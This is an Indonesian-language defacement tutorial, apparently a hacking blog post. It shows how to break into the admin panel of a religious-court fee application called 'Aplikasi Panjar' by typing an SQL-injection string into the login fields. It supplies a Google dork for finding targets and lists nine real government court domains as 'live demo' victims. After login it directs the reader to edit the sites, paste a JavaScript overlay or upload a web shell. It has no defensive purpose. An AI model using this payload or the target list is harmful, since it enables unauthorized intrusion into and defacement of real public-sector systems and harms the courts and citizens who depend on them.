Deface Exploit Aplikasi Panjar Goverment Indonesia Authentication Bypass Vulnerability

# Exploit Title : Aplikasi Panjar Goverment Indonesia Authentication Bypass Vulnerability
# Exploit Author : Chu404
# Exploit Media Author : @chu_403
# Google Dork : intext:"Aplikasi Panjar Pengadilan Agama" inurl:/admin/
# Exploit User : ' or 1=1 limit 1 -- -+

Live Demo :
# http://panjar.pa-lamongan.go.id/
# http://panjar.pa-situbondo.go.id/
# http://panjar.pa-klaten.go.id/
# http://sapm.pa-lubuksikaping.go.id/
# http://panjar.pa-morotai.go.id/
# http://panjar.pa-makale.go.id/
# https://pa-tanjung.go.id/panjar
# http://biaya-perkara.pa-kendal.go.id/
# http://panjar.pa-trenggalek.go.id/

OK Langsung saja di praktekan

kalian dorking terlebih dahulu atau gunakan live demo yang tertera

saya anggap kalian sudah mendapatkan targetnya.. langsung saja cek admin login contoh : target.com/admin/ dan masukkan exploit user pada kolom username dan password


jika vuln maka kamu akan berhasil masuk dashboard adminnya

Selanjutnya pergi ke Pengaturan > Instalasi Pengguna. lihat gambar dibawah


Selanjutnya kalian bisa edit2 webnya, menempelkan JS Overlay, atau bisa juga upshell ( Tamper Data Only )

Greets To :
- XploitSec-ID - Palembang Cyber Team - PsychoXploit - D45H7 -


OK Semoga Tutorial kali ini bermanfaat !! Jangan lupa untuk share ke teman2 kalian
LihatTutupKomentar
loading...